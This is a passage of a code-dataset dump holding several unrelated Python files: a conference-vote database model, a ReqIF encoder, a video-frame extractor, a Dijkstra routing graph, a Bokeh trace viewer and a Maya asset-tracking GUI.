data\n\n\nclass CFPVote(db.Model):\n __versioned__ = {}\n __tablename__ = 'cfp_vote'\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n proposal_id = db.Column(db.Integer, db.ForeignKey('proposal.id'), nullable=False)\n state = db.Column(db.String, nullable=False)\n has_been_read = db.Column(db.Boolean, nullable=False, default=False)\n\n created = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n modified = db.Column(db.DateTime, nullable=False, default=datetime.utcnow, onupdate=datetime.utcnow)\n\n vote = db.Column(db.Integer) # Vote can be null for abstentions\n note = db.Column(db.String)\n\n def __init__(self, user, proposal):\n self.user = user\n self.proposal = proposal\n self.state = 'new'\n\n def set_state(self, state):\n state = state.lower()\n if state not in VOTE_STATES:\n raise CfpStateException('\"%s\" is not a valid state' % state)\n\n if state not in VOTE_STATES[self.state]:\n raise CfpStateException('\"%s->%s\" is not a valid transition' % 
(self.state, state))\n\n        self.state = state\n\n    @classmethod\n    def get_export_data(cls):\n        count_attrs = ['state', 'has_been_read', 'vote']\n        edits_attrs = ['state', 'vote', 'note']\n\n        data = {\n            'public': {\n                'votes': {\n                    'counts': export_attr_counts(cls, count_attrs),\n                    'edits': export_attr_edits(cls, edits_attrs),\n                },\n            },\n            'tables': ['cfp_vote', 'cfp_vote_version'],\n        }\n        data['public']['votes']['counts']['created_day'] = export_intervals(cls.query, cls.created, 'day', 'YYYY-MM-DD')\n\n        return data\n\n\nclass Venue(db.Model):\n    __tablename__ = 'venue'\n    __export_data__ = False\n\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String, nullable=False)\n    type = db.Column(db.String, nullable=True)\n    priority = db.Column(db.Integer, nullable=True, default=0)\n    lat = db.Column(db.Float)\n    lon = db.Column(db.Float)\n\n    __table_args__ = (\n        UniqueConstraint('name', name='_venue_name_uniq'),\n    )\n\n    def __repr__(self):\n        return \"<Venue id={0}, name={1}>\".format(self.id, self.name)\n\n\n# TODO: change the relationships on User and Proposal to 1-to-1\ndb.Index('ix_cfp_vote_user_id_proposal_id', CFPVote.user_id, CFPVote.proposal_id, unique=True)\n","sub_path":"models/cfp.py","file_name":"cfp.py","file_ext":"py","file_size_in_byte":21734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"148977607","text":"from xml.etree.ElementTree import Element\nfrom .. import TReqz\n\n\nclass reqif_specification(TReqz.reqif_identifiable):\n\n def __init__(self, content: Element = None, id_dict=None):\n self.values: list = list() # reqif_attribute_value\n self.children: list = list() # reqif_spec_hierarchy\n self.type: TReqz.reqif_specification_type = None # localRef, required\n super(reqif_specification, self).__init__(content, id_dict)\n self.name = \"SPECIFICATION\"\n\n def decode(self, content: Element, id_dict: TReqz.reqif_id_dict = None):\n super().decode(content, id_dict)\n namespace = TReqz.xml_utils.get_tag_namespace(content.tag)\n\n self.values = TReqz.reqif_utils.generate_object_list_by_element_class(\n content, id_dict, \"./{0}VALUES\".format(namespace), TReqz.reqif_config.ATTRIBUTE_VALUE_TAG_TO_CLASS)\n\n self.children = TReqz.reqif_utils.generate_object_list_by_element_class(\n content, id_dict, \"./{0}CHILDREN\".format(namespace), TReqz.reqif_config.SPEC_HIERARCHY_TAG_TO_CLASS)\n\n self.type = TReqz.reqif_utils.get_local_ref_from_element_text(\n content, id_dict, \"./{0}TYPE/{0}SPECIFICATION-TYPE-REF\".format(namespace))\n\n def encode(self):\n elem = super().encode()\n elem.tag = self.name\n\n if self.values!= None and len(self.values) > 0:\n valuesElement = TReqz.xml_utils.addRequiredSubElement(\n elem, \"VALUES\")\n for value in self.values:\n TReqz.xml_utils.addEncodedSubElement(valuesElement, value)\n\n if self.children != None and len(self.children) > 0:\n childrenElement = TReqz.xml_utils.addRequiredSubElement(\n elem, \"CHILDREN\")\n for child in self.children:\n TReqz.xml_utils.addEncodedSubElement(childrenElement, child)\n\n if self.type != None:\n typeElement = TReqz.xml_utils.addRequiredSubElement(elem, \"TYPE\")\n TReqz.xml_utils.addRequiredSubElement(\n typeElement, \"SPECIFICATION-TYPE-REF\", self.type.identifier)\n\n return elem\n","sub_path":"TReqz/reqif_specification.py","file_name":"reqif_specification.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"442644833","text":"import cv2\nimport numpy as np\n\n# root = './' + input('Input the dataset folder: ')\n# filename = root + input(\"Please input the filename: \")\n# directory = root + input(\"Please input the desired directory name: \") + \"/\"\nfilename = \"./vid2.mp4\"\ndirectory = \"./HB/HB09/\"\ncap = cv2.VideoCapture(filename)\n\nif cap.isOpened() is not True:\n print(\"Error with opening the provided file\")\n\ncurrent_frame = 1\ntrack = 1\nwhile cap.isOpened():\n # Capture frame-by-frame\n if track < 150:\n ret, frame = cap.read()\n track += 1\n else:\n ret, frame = cap.read()\n if ret:\n\n # Display the resulting frame\n cv2.imshow('Frame', frame)\n current_filename = directory + \"%06d.jpg\" % current_frame\n cv2.imwrite(current_filename, frame)\n current_frame += 1\n\n # Press Q on keyboard to exit\n if cv2.waitKey(25) & 0xFF == ord('q'):\n break\n\n# When everything done, release the video capture object\ncap.release()\n\n# Closes all the frames\ncv2.destroyAllWindows()\n","sub_path":"data/format_data.py","file_name":"format_data.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"55904352","text":"from .link import Link\nfrom .node import Node\n\nINVALID_VALUE = -1\n\nclass Graph(object):\n def __init__(self, links = [], nodes = []):\n self.cost = {}\n self.links = links\n self.nodes = nodes\n\n self.createCostMatrix()\n\n def addLink(self, node_id_1, node_id_2, weight):\n node1 = Node(node_id_1)\n node2 = Node(node_id_2)\n link = Link(node1, node2, weight)\n self.links.append(link)\n\n # TODO: Como saber a capacidade do link? Por enquanto, está fixa no código.\n # print('node1.id = ', node1.id)\n # print('node2.id = ', node2.id)\n #\n # print('link.node1.id = ', link.node1.id)\n # print('link.node2.id = ', link.node2.id)\n # print('link.weight = ', link.weight)\n #\n # print('cost matrix = ', self.cost)\n # print('cost matrix[link.node1.id] = ', self.cost[link.node1.id])\n # print('cost matrix[link.node2.id] = ', self.cost[link.node2.id])\n\n self.cost[link.node1.id][link.node2.id] = 1/link.weight\n self.cost[link.node2.id][link.node1.id] = 1/link.weight\n\n def containsLink(self, node_id_1, node_id_2):\n for link in self.links:\n if (link.node1.id == node_id_1 and link.node2.id == node_id_2) or (link.node1.id == node_id_2 and link.node2.id == node_id_1):\n return True\n return False\n\n def removeLink(self, node_id_1, node_id_2):\n for link in self.links:\n if (link.node1.id == node_id_1 and link.node2.id == node_id_2) or (link.node1.id == node_id_2 and link.node2.id == node_id_1):\n link_index = self.links.index(link)\n del self.links[link_index]\n\n # TODO: Remover da matriz de adjacencia === Colocar valor inválido\n self.cost[link.node1.id][link.node2.id] = INVALID_VALUE\n self.cost[link.node2.id][link.node1.id] = INVALID_VALUE\n\n def addNode(self, node_id):\n node = Node(node_id)\n self.nodes.append(node)\n self.cost[node_id] = {}\n\n def removeNode(self, node_id):\n for node in self.nodes:\n if node.id == node_id:\n node_index = self.nodes.index(node)\n del self.nodes[node_index]\n\n # TODO: Remover da matriz de adjacencia tb\n\n def containsNodeId(self, node_id):\n for node in self.nodes:\n if node.id == node_id:\n return True\n return False\n\n def createCostMatrix(self):\n if len(self.links) == 0: return\n\n # cost is NxN array of 'foo' (which can depend on i and j if you want)\n self.cost = [[float('inf') for i in range(len(self.nodes))] for j in range(len(self.nodes))]\n\n for link in self.links:\n # Inicializa custo bidirecional\n self.cost[link.node1.id][link.node2.id] = 1 / link.weight\n self.cost[link.node2.id][link.node1.id] = 1 / link.weight\n\n def createDistancesDict(self):\n # Cria dicionário de distâncias de cada nodo até todos os outros\n # distances = {\n # 'B': {'A': 5, 'D': 1, 'G': 2},\n # 'A': {'B': 5, 'D': 3, 'E': 12, 'F' :5},\n # 'D': {'B': 1, 'G': 1, 'E': 1, 'A': 3},\n # 'G': {'B': 2, 'D': 1, 'C': 2},\n # 'C': {'G': 2, 'E': 1, 'F': 16},\n # 'E': {'A': 12, 'D': 1, 'C': 1, 'F': 2},\n # 'F': {'A': 5, 'E': 2, 'C': 16}}\n distances = {}\n for node1 in self.nodes:\n # Percorre a linha\n distances[node1.id] = {}\n for node2 in self.nodes:\n distances[node1.id][node2.id] = self.cost[node1.id][node2.id]\n\n return distances\n\n def updatePathCostMatrix(self, path, consumed_bandwidth):\n # Atualiza as larguras de banda disponiveis de cada link\n for i in range(len(path) - 1):\n item_index_source = path[i]\n item_index_target = path[i+1]\n self.cost[item_index_source][item_index_target] = self.cost[item_index_source][item_index_target] - (1 / consumed_bandwidth)\n\n new_distances = self.createDistancesDict()\n\n print(' - Updated 
cost')\n self.printCostMatrix()\n print('\\n\\n')\n\n\n def getMinimumCostPath(self, flow):\n # Calcula caminho de custo mínimo, onde o custo de cada caminho é o recíproco\n # da sua capacidade disponível (1/capacidade). Após associar um par de\n # switches a um caminho, atualiza o custo de cada link.\n print('-> Get mininum cost path [Dijkstra] from {0} to {1}\\n'.format(\n flow.source.id, flow.target.id))\n\n min_cost_path = self.dijsktra(flow.source, flow.target)\n print(' - Path found: {0}\\n'.format(min_cost_path))\n\n self.updatePathCostMatrix(min_cost_path, flow.bandwidth)\n\n return min_cost_path\n\n def dijsktra(self, source, target):\n # shortest paths is a dict of nodes whose value is a tuple of (previous node, weight)\n shortest_paths = {source.id: (None, 0)}\n current_node = source.id\n distances = self.createDistancesDict()\n visited = set()\n\n while current_node != target.id:\n visited.add(current_node)\n destinations = distances[current_node]\n weight_to_current_node = shortest_paths[current_node][1]\n\n for next_node in destinations:\n weight = self.cost[current_node][next_node] + weight_to_current_node\n if next_node not in shortest_paths:\n shortest_paths[next_node] = (current_node, weight)\n else:\n current_shortest_weight = shortest_paths[next_node][1]\n if current_shortest_weight > weight:\n shortest_paths[next_node] = (current_node, weight)\n\n next_destinations = {node: shortest_paths[node] for node in shortest_paths if node not in visited}\n\n if len(next_destinations.values()) == 0:\n return \"Route Not Possible\"\n # next node is the destination with the lowest weight\n current_node = min(next_destinations, key=lambda k: next_destinations[k][1])\n\n # Work back through destinations in shortest path\n path = []\n while current_node is not None:\n path.append(current_node)\n next_node = shortest_paths[current_node][0]\n current_node = next_node\n # Reverse path\n path = path[::-1]\n return path\n\n def printCostMatrix(self):\n print('-> Cost matrix:')\n print(self.cost)\n print('\\n')\n\n def printGraph(self):\n for link in self.links:\n print('{node1}-------({weight})-------{node2}'.format(\n node1=link.node1.id,\n weight=link.weight,\n node2=link.node2.id\n ))\n","sub_path":"routing/graphModel/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":6826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"149391418","text":"#!/usr/bin/env python3\n\n# Run this script with this command:\n# $ bokeh serve --show ./main.py --args \"trace_file\"\n\nimport sys\nimport collections\nimport random\nimport functools\nimport traceback\nimport math\nimport datetime\nimport pandas\nimport numpy\nimport bokeh.plotting\nimport bokeh.io\nimport bokeh.models\nimport bokeh.models.tickers\nimport bokeh.layouts\nimport bokeh.palettes\nimport bokeh.transform\n\nclass TimelineTraceSlice:\n def __init__(self, df):\n self.__df = df\n self.__df.reset_index(inplace=True, drop=True)\n\n def get_sampled_slice(self, num_samples):\n return TimelineTraceSlice(self.__df.sample(num_samples)\n if self.size() > num_samples else self.__df)\n\n def dataframe(self):\n return self.__df\n\n def size(self):\n return len(self.__df.index)\n\n def add_rank_pos(self, num_conc):\n self.__df = self.__df.assign(\n rank0_pos=self.__df.loc[:, 'rank0']+\n (numpy.mod(self.__df.index, num_conc)+0.5)/num_conc,\n height=1/num_conc)\n self.__df = self.__df.assign(\n rank1_pos=numpy.where(self.__df.loc[:, 'rank0'] == self.__df.loc[:, 'rank1'],\n self.__df.loc[:, 'rank0_pos'],\n self.__df.loc[:, 'rank1']+0.5))\n\nclass TimelineTrace:\n def read_csv(self, input_path):\n COLUMNS = ['rank0', 't0', 'rank1', 't1', 'kind']\n print(\"Reading CSV...\")\n df = pandas.read_csv(input_path, names=COLUMNS)\n\n print(\"Preparing data...\")\n df['duration'] = df['t1']-df['t0']\n self.__columns = df.columns\n self.__time_min = df['t0'].min()\n self.__time_max = df['t1'].max()\n\n df.sort_values('t0', inplace=True)\n df.rename_axis('line', inplace=True)\n\n self.__data = collections.OrderedDict((x for x in df.groupby('kind'))) # workaround\n self.__t1_index = collections.OrderedDict()\n for kind, kind_df in self.__data.items():\n kind_df.reset_index(inplace=True)\n self.__t1_index[kind] = kind_df['t1'].sort_values()\n\n print(\"Trace is loaded.\")\n return self\n\n def get_sampled_time_slice(self, time_range, kinds, num_samples):\n print(\"Making slices...\")\n index_start = numpy.fromiter(\n ((t1_ser.searchsorted(time_range[0]).item() if kind in kinds else 0)\n for kind, t1_ser in self.__t1_index.items()), dtype=int)\n index_end = numpy.fromiter(\n ((kind_df['t0'].searchsorted(time_range[1], 'right').item() if kind in kinds else 0)\n for kind, kind_df in self.__data.items()), dtype=int)\n\n num_list = index_end - index_start\n num_sum_right = num_list.cumsum()\n num_total = num_sum_right[len(num_sum_right)-1] if num_sum_right.size > 0 else 0\n num_sum_left = [(0 if i == 0 else num_sum_right[i-1]) for i in range(len(num_sum_right))]\n\n sampled_idxs = range(num_total)\n if num_total > num_samples:\n sampled_idxs = random.sample(sampled_idxs, num_samples)\n sampled_idxs = numpy.array(sampled_idxs)\n sampled_idxs.sort()\n\n si_left = numpy.searchsorted(sampled_idxs, num_sum_left, 'left')\n si_right = numpy.searchsorted(sampled_idxs, num_sum_right, 'left')\n local_sampled_idxs = [sampled_idxs[l:r]-ns for l, r, ns in zip(si_left, si_right, num_sum_left)]\n\n sub_data = pandas.concat(df.iloc[idx_start+idxs] for df, idx_start, idxs\n in zip(self.__data.values(), index_start, local_sampled_idxs))\n return TimelineTraceSlice(sub_data), num_total\n\n def get_empty_time_slice(self):\n return TimelineTraceSlice(pandas.DataFrame(columns=self.__columns))\n\n def get_time_range(self):\n return self.__time_min, self.__time_max\n\n def get_kinds(self):\n return list(self.__data.keys())\n\nclass TimelineTraceViewer:\n __refreshed = { 'main': True, 'sub': True }\n 
__slider_values = {\n 'num_main_bar_samples': 10000,\n 'label_rate': 0.0,\n 'num_rt_bar_samples': 10000,\n 'num_conc': 1\n }\n __active_main_tab = 0\n\n def __init__(self, trace):\n print(\"Initializing viewer...\")\n self.__trace = trace\n self.__kinds = self.__trace.get_kinds()\n self.__visible_kinds = set(self.__kinds)\n\n def big_palette(size, palette_func):\n if size < 256:\n return palette_func(size)\n p = palette_func(256)\n colors = []\n for i in range(size):\n idx = int(i * 256.0 / size)\n colors.append(p[idx])\n return colors\n\n kind_colors = big_palette(len(self.__kinds), bokeh.palettes.viridis)\n color_mapper = bokeh.transform.factor_cmap(\n field_name='kind', factors=self.__kinds, palette=kind_colors)\n\n TOOLTIPS = [\n ('line', \"@line\"),\n (\"t\", \"(@t0,@t1)\"),\n (\"duration\", \"@duration\"),\n (\"rank\", \"(@rank0,@rank1)\"),\n (\"kind\", \"@kind\")\n ]\n\n init_time_range = self.__trace.get_time_range()\n self.__main_time_range = init_time_range\n self.__rt_time_range = init_time_range\n\n MainTabInfo = collections.namedtuple(\n 'MainTabInfo', ('fig', 'migration_seg', 'bar_src', 'label_src', 'panel'))\n\n def make_main_tab(tab_num, backend, title, x_range, y_range):\n fig = bokeh.plotting.figure(\n plot_width=1200, plot_height=800,\n x_range=x_range, y_range=y_range,\n tools='hover,xwheel_zoom,ywheel_zoom,xpan,ypan,reset,crosshair,save,help',\n active_drag='xpan', active_scroll='xwheel_zoom',\n tooltips=TOOLTIPS, output_backend=backend)\n\n yticker = bokeh.models.tickers.SingleIntervalTicker(interval=1)\n fig.yaxis.ticker = yticker\n fig.ygrid.grid_line_alpha = 1\n fig.ygrid.grid_line_color = 'black'\n fig.ygrid.ticker = yticker\n\n bar_src, label_src = map(bokeh.models.ColumnDataSource, self.__get_main_data(tab_num))\n\n fig.hbar(\n y='rank0_pos', left=\"t0\", right=\"t1\", height='height', legend='kind',\n color=color_mapper, hover_color=color_mapper, alpha=0.8, hover_alpha=1.0,\n hover_line_color=\"firebrick\", source=bar_src)\n\n migration_seg = fig.segment(\n x0='t1', x1='t1', y0='rank0_pos', y1='rank1_pos',\n color=color_mapper, source=bar_src)\n migration_seg.visible = False\n\n labels = bokeh.models.LabelSet(\n y='rank0_pos', x='t0', text='kind', text_baseline='middle',\n source=label_src, level='glyph', render_mode='canvas')\n fig.add_layout(labels)\n\n panel = bokeh.models.Panel(child=fig, title=title)\n\n return MainTabInfo(fig=fig, migration_seg=migration_seg,\n bar_src=bar_src, label_src=label_src, panel=panel)\n\n webgl_main_tab = make_main_tab(0, 'webgl', \"WebGL\", init_time_range, None)\n webgl_main_tab.fig.x_range.on_change('start', self.__on_change_time_range)\n webgl_main_tab.fig.x_range.on_change('end', self.__on_change_time_range)\n\n svg_main_tab = make_main_tab(\n 1, 'svg', \"SVG\", webgl_main_tab.fig.x_range, webgl_main_tab.fig.y_range)\n\n self.__main_tabs = (webgl_main_tab, svg_main_tab)\n main_tabs = bokeh.models.Tabs(tabs=[ti.panel for ti in self.__main_tabs])\n main_tabs.on_change('active', self.__on_change_main_tab)\n\n init_rt_bar_data = self.__get_rangetool_data(init_time_range)\n self.__rt_bar_src = bokeh.models.ColumnDataSource(init_rt_bar_data)\n\n rt_fig = bokeh.plotting.figure(plot_width=1200, plot_height=150,\n toolbar_location=None, output_backend='webgl')\n\n self.__rt_bar = rt_fig.hbar(y=\"rank0_pos\", left=\"t0\", right=\"t1\", height=0.5,\n color=color_mapper, alpha=0.8, source=self.__rt_bar_src)\n\n range_tool = bokeh.models.RangeTool(x_range=webgl_main_tab.fig.x_range)\n rt_fig.add_tools(range_tool)\n\n 
self.__sample_info_div = bokeh.models.widgets.Div(text=self.__get_sample_info())\n\n def create_slider(name, **kwargs):\n slider = bokeh.models.widgets.Slider(value=self.__slider_values[name], **kwargs)\n slider.on_change('value', functools.partial(self.__on_change_slider, name))\n return slider\n\n num_main_bar_samples_slider = create_slider('num_main_bar_samples',\n start=1, end=100000, step=1, title=\"# of samples for main plot\")\n\n label_rate_slider = create_slider('label_rate',\n start=0, end=1, step=0.01, title=\"Rate for showing labels\")\n\n num_rt_bar_samples_slider = create_slider('num_rt_bar_samples',\n start=1, end=100000, step=1, title=\"# of samples for sub plot\")\n\n num_conc_slider = create_slider('num_conc',\n start=1, end=30, step=1, title=\"# of concurrent events\")\n\n migrate_checkbox_group = \\\n bokeh.models.widgets.CheckboxGroup(labels=[\"Show migrations\"], active=[])\n migrate_checkbox_group.on_click(self.__on_click_migrate_checkboxes)\n\n kind_all_button = \\\n bokeh.models.widgets.CheckboxButtonGroup(labels=[\"Show all\"], active=[0])\n kind_all_button.on_click(self.__on_click_show_all_kinds)\n\n self.__kind_checkbox_group = \\\n bokeh.models.widgets.CheckboxGroup(\n labels=self.__kinds, active=list(range(len(self.__kinds))))\n self.__kind_checkbox_group.on_click(self.__on_click_kind_checkboxes)\n\n curdoc = bokeh.io.curdoc()\n row = bokeh.layouts.row\n column = bokeh.layouts.column\n left_layout = column(main_tabs, rt_fig)\n right_layout = column(self.__sample_info_div,\n num_main_bar_samples_slider, label_rate_slider,\n num_rt_bar_samples_slider, num_conc_slider,\n migrate_checkbox_group,\n kind_all_button, self.__kind_checkbox_group)\n curdoc.add_root(row(left_layout, right_layout))\n curdoc.add_periodic_callback(self.__on_timer, 100)\n print(\"Viewer is initialized.\")\n\n def __get_main_data(self, tab_num):\n is_active = tab_num == self.__active_main_tab\n bar_sl, num_total = self.__get_sampled_time_slice(\n self.__main_time_range, self.__slider_values['num_main_bar_samples']) \\\n if is_active else self.__get_empty_data()\n if is_active:\n self.__num_main_actual_events = num_total\n\n num_label_samples = math.ceil(bar_sl.size() * self.__slider_values['label_rate'])\n label_sl = bar_sl.get_sampled_slice(num_label_samples)\n return bar_sl.dataframe(), label_sl.dataframe()\n\n def __get_rangetool_data(self, time_range):\n rangetool_sl, _ = self.__get_sampled_time_slice(\n self.__rt_time_range, self.__slider_values['num_rt_bar_samples'])\n return rangetool_sl.dataframe()\n\n def __get_sampled_time_slice(self, time_range, num_samples):\n sl, num_total = self.__trace.get_sampled_time_slice(time_range, self.__visible_kinds, num_samples)\n sl.add_rank_pos(self.__slider_values['num_conc'])\n return sl, num_total\n\n def __get_empty_data(self):\n sl = self.__trace.get_empty_time_slice()\n sl.add_rank_pos(self.__slider_values['num_conc'])\n return sl, 0\n\n def __update_main_data(self):\n for i, ti in enumerate(self.__main_tabs):\n ti.bar_src.data, ti.label_src.data = \\\n map(bokeh.models.ColumnDataSource.from_df, self.__get_main_data(i))\n self.__sample_info_div.text = self.__get_sample_info()\n\n def __update_rangetool_data(self):\n self.__rt_bar_src.data = \\\n bokeh.models.ColumnDataSource.from_df(\n self.__get_rangetool_data(self.__rt_time_range))\n\n def __get_sample_info(self):\n n_actual = self.__num_main_actual_events\n n_limit = self.__slider_values['num_main_bar_samples']\n if n_actual > n_limit:\n msg = \"{:.3f} % sampled\".format(n_limit / n_actual * 
100)\n        else:\n            msg = \"accurate\"\n        return \"# of actual events for main plot: {}<br>
\" \\\n \"({})\".format(n_actual, msg)\n\n def __on_change_time_range(self, attr, old, new):\n if attr == 'start':\n self.__main_time_range = (new, self.__main_time_range[1])\n self.__request_refresh_main()\n elif attr == 'end':\n self.__main_time_range = (self.__main_time_range[0], new)\n self.__request_refresh_main()\n\n def __on_change_main_tab(self, attr, old, new):\n self.__active_main_tab = new\n self.__request_refresh_main()\n\n def __on_change_slider(self, name, attr, old, new):\n self.__slider_values[name] = new\n self.__request_refresh_all()\n\n def __on_click_migrate_checkboxes(self, active_list):\n is_visible = 0 in active_list\n for ti in self.__main_tabs:\n ti.migration_seg.visible = is_visible\n\n def __on_click_kind_checkboxes(self, active_list):\n self.__visible_kinds = set(self.__kinds[i] for i in active_list)\n self.__request_refresh_all()\n\n def __on_click_show_all_kinds(self, active_list):\n self.__kind_checkbox_group.active = \\\n list(range(len(self.__kinds))) if 0 in active_list else []\n\n def __request_refresh_main(self):\n self.__refreshed['main'] = False\n\n def __request_refresh_all(self):\n self.__request_refresh_main()\n self.__refreshed['sub'] = False\n\n def __on_timer(self):\n def refresh(plot_name, update_func):\n if not self.__refreshed[plot_name]:\n start_time = datetime.datetime.now()\n print(\"Refreshing {} plot...\".format(plot_name))\n update_func()\n self.__refreshed[plot_name] = True\n end_time = datetime.datetime.now()\n print(\"Refreshed {} plot in {} sec.\"\n .format(plot_name, (end_time-start_time).total_seconds()))\n try:\n refresh('main', self.__update_main_data)\n refresh('sub', self.__update_rangetool_data)\n except:\n # See the trace inside the callback for debugging.\n traceback.print_exc()\n raise\n\ntrace = TimelineTrace()\nif len(sys.argv) < 2:\n sys.exit(\"{} [CSV path]\".format(sys.argv[0]))\ntrace.read_csv(sys.argv[1])\nviewer = TimelineTraceViewer(trace)\n\n","sub_path":"viewer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"138548273","text":"#!/usr/bin/env python\n#coding:utf-8\n# Author: LiYaJun --\n# Purpose: Asset Tracking for Maya\n# Created: 2013/9/11\n\nimport sys,os,shutil\n#from PyQt4.QtCore import *\n#from PyQt4.QtGui import *\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\n\n#import maya.cmds as mc\n\n#import sip\n#import maya.OpenMayaUI as mui\n\n##----------------------------------------------------------------------\ndef GetMayaWindow():\n #\"\"\"Get the maya main window as a QMainWindow instance\"\"\"\n ptr = mui.MQtUtil.mainWindow()\n return sip.wrapinstance(long(ptr), QObject)\n\n\n\n########################################################################\nclass AssetTracking(QMainWindow):\n \"\"\"AssetTracking for maya\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self, parent=None):\n \"\"\"Constructor\"\"\"\n \n super(AssetTracking, self).__init__(parent)\n \n self._files = [] #fileNodes mc.ls(type='file')\n \n self.InitUI()\n \n \n \"\"\"\"\"\"\"\"\"\"\"\"\n #Properties:\n \"\"\"\"\"\"\"\"\"\"\"\"\n #----------------------------------------------------------------------\n def _getFiles(self):\n \"\"\"\"\"\"\n return self._files\n #----------------------------------------------------------------------\n def _setFiles(self,v):\n if isinstance(v, list):\n self._files = v\n Files = property(_getFiles, _setFiles)\n \n \n #----------------------------------------------------------------------\n def InitUI(self):\n \"\"\"init ui\"\"\"\n self.resize(1050, 650)\n self.setWindowTitle(\"Asset Tracking for Maya:: Dev By LiYaJun\")\n \n self.CreateMenu()\n self.CreateMainToolBar()\n self.CollectFileData()\n self.CreateTable()\n self.CreateContextMenu()\n self.statusBar()\n \n #----------------------------------------------------------------------\n def CreateMenu(self):\n \"\"\"init QAction & build main menu\"\"\"\n mainMenu = self.menuBar()\n \n #\n #File\n editMenu = mainMenu.addMenu(\"&File\")\n self.setPath = QAction(\"Set Path...\", self)\n self.setPath.setStatusTip(\"Specify asset path\")\n self.setPath.triggered.connect(self.SetPath)\n editMenu.addAction(self.setPath)\n \n self.browse = QAction(\"Browse...\", self)\n self.browse.setStatusTip(\"Browse image file\")\n self.browse.triggered.connect(self.Browse)\n editMenu.addAction(self.browse)\n \n self.rename = QAction(\"Rename...\", self)\n self.rename.setStatusTip(\"Rename image file and Update shader connection\")\n self.rename.triggered.connect(self.Rename)\n editMenu.addAction(self.rename)\n editMenu.addSeparator()\n #---------------------------\n \n self.copyTo = QAction(\"Copy To...\", self)\n self.copyTo.setStatusTip(\"Copy selected image to...\")\n self.copyTo.triggered.connect(self.CopyTo)\n editMenu.addAction(self.copyTo)\n \n self.moveTo = QAction(\"Move To...\", self)\n self.moveTo.setStatusTip(\"Move selected image to...\")\n self.moveTo.triggered.connect(self.MoveTo)\n editMenu.addAction(self.moveTo)\n editMenu.addSeparator()\n #-----------------------------\n \n self.view = QAction(\"View Image\", self)\n self.view.setStatusTip(\"View selected image\")\n self.view.triggered.connect(self.View)\n editMenu.addAction(self.view)\n \n self.reveal = QAction(\"Reveal in explorer\", self)\n self.reveal.setStatusTip(\"Reveal image file in explorer\")\n self.reveal.triggered.connect(self.Reveal)\n editMenu.addAction(self.reveal)\n editMenu.addSeparator()\n #-----------------------------\n \n self.refresh = QAction(\"Refresh\", self)\n 
self.refresh.setStatusTip(\"Refresh\")\n self.refresh.triggered.connect(self.Refresh)\n editMenu.addAction(self.refresh)\n \n #\n #Sort\n sortMenu = mainMenu.addMenu(\"So&rt\")\n \n self.sortA2Z = QAction(\"A->Z\", self)\n self.sortA2Z.setStatusTip(\"Sort by A to Z\")\n self.sortA2Z.triggered.connect(self.SortA2Z)\n sortMenu.addAction(self.sortA2Z)\n \n self.sortZ2A = QAction(\"Z->A\", self)\n self.sortZ2A.setStatusTip(\"Sort by Z to A\")\n self.sortZ2A.triggered.connect(self.SortZ2A)\n sortMenu.addAction(self.sortZ2A)\n \n self.sortByExtension = QAction(\"By Type\", self)\n self.sortByExtension.setStatusTip(\"Sort by Type(file extension)\")\n self.sortByExtension.triggered.connect(self.SortByExtension)\n sortMenu.addAction(self.sortByExtension)\n \n self.sortByStatus = QAction(\"By Status\", self)\n self.sortByStatus.setStatusTip(\"Sort by file status\")\n self.sortByStatus.triggered.connect(self.SortByStatus)\n sortMenu.addAction(self.sortByStatus)\n\n #\n #Select\n selByMenu = mainMenu.addMenu(\"&Select\")\n \n self.highLightByObj = QAction(\"HighLight By Object\", self)\n self.highLightByObj.setStatusTip(\"HighLight image file by selected object(geometry)\")\n self.highLightByObj.triggered.connect(self.HighLightByObj)\n selByMenu.addAction(self.highLightByObj)\n \n self.highLightByMat = QAction(\"HighLight By Material\", self)\n self.highLightByMat.setStatusTip(\"HighLight image file by selected material\")\n self.highLightByMat.triggered.connect(self.HighLightByMat)\n selByMenu.addAction(self.highLightByMat)\n \n self.highLightByTex = QAction(\"HighLight By Texture\", self)\n self.highLightByTex.setStatusTip(\"HighLight image file by selected texture(file node)\")\n self.highLightByTex.triggered.connect(self.HighLightByTex)\n selByMenu.addAction(self.highLightByTex)\n selByMenu.addSeparator()\n #-------------------------------------\n \n self.highLightByKeyWord = QAction(\"HighLight By Keyword...\", self)\n self.highLightByKeyWord.setStatusTip(\"HighLight image file by Keyword...(User Input)\")\n self.highLightByKeyWord.triggered.connect(self.HighLightByKeyWord)\n selByMenu.addAction(self.highLightByKeyWord)\n selByMenu.addSeparator()\n #-------------------------------------\n \n self.selectGeometry = QAction(\"Select Geometry\", self)\n self.selectGeometry.setStatusTip(\"Select relevant geometry\")\n self.selectGeometry.triggered.connect(self.SelectGeometry)\n selByMenu.addAction(self.selectGeometry)\n \n self.selectMaterial = QAction(\"Select Material\",self)\n self.selectMaterial.setStatusTip(\"Select relevant material(s)\")\n self.selectMaterial.triggered.connect(self.SelectMaterial)\n selByMenu.addAction(self.selectMaterial)\n \n #----------------------------------------------------------------------\n def CreateContextMenu(self):\n \"\"\"build context menu\"\"\"\n def AddSeparator():\n sp = QAction(self)\n sp.setSeparator(True)\n self.tb.addAction(sp) \n \n self.tb.addAction(self.setPath)\n self.tb.addAction(self.browse)\n self.tb.addAction(self.rename)\n AddSeparator()\n self.tb.addAction(self.copyTo)\n self.tb.addAction(self.moveTo)\n AddSeparator()\n self.tb.addAction(self.view)\n self.tb.addAction(self.reveal)\n \n AddSeparator()\n self.tb.addAction(self.sortA2Z)\n self.tb.addAction(self.sortZ2A)\n 